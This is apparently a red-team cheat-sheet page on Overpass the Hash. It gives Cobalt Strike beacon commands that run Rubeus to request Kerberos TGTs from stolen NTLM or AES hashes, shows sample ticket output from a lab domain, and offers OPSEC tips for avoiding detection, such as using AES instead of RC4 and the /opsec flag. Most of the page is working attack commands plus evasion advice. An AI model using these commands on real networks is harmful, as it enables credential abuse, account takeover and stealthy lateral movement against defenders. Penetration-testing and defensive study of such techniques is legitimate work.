Overpass The Hash
Overpass The Hash
Overpass The Hash is a technique that allows us to request a kerberos TGT for a user, using their NTLM or AES hash.
Note: Elevated privileges are required to obtain a user hash, but not needed to request a kerberos TGT.
Cobalt Strike - Rubeus w/ NTLM
beacon> execute-assembly C:\Tools\Rubeus.exe asktgt /user:robert /ntlm:2B576ACBE6BCFDA7294D6BD18041B8FE /nowrap
[*] Action: Ask TGT
[*] Using rc4_hmac hash: 2B576ACBE6BCFDA7294D6BD18041B8FE
[*] Building AS-REQ (w/ preauth) for: 'dev.rotta.dev\robert'
[*] Using domain controller: 10.15.211.9:88
[09/01 10:24:04] [+] received output:
[+] TGT request successful!
[*] base64(ticket.kirbi):
ServiceName : krbtgt/dev.rotta.dev
ServiceRealm : DEV.ROTTA.DEV
UserName : robert
UserRealm : DEV.ROTTA.DEV
...
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : MkI1NzZBQ0JFNkJDRkRBNzI5NEQ2QkQxODA0MUI4RkU=
ASREP (key) : 2B576ACBE6BCFDA7294D6BD18041B8FE
Note: Now that we've obtained a TGT, it can then be leveraged via Pass the Ticket.
OPSEC
Note: Using an NTLM hash results in a ticket encrypted using RC4 (0x17). This is considered a legacy encryption type and therefore often stands out as anomalous in a modern Windows environment. It's better to request a TGT with AES than it is with NTLM. The below example is better OPSEC.
Cobalt Strike - Rubeus w/ AES
beacon> execute-assembly C:\Tools\Rubeus.exe asktgt /user:robert /aes256:<aeshash> /nowrap
OPSEC
If no /domain
is specified, Rubeus uses the FQDN of the domain this computer is in. Instead, we can force it to use the NetBIOS name with /domain:DEV
.
The /opsec
flag tells Rubeus to request the TGT in a way that results in the Ticket Options being 0x40810010.
beacon> execute-assembly C:\Tools\Rubeus.exe asktgt /user:robert /aes256:<aeshash> /domain:DEV /opsec /nowrap
Last updated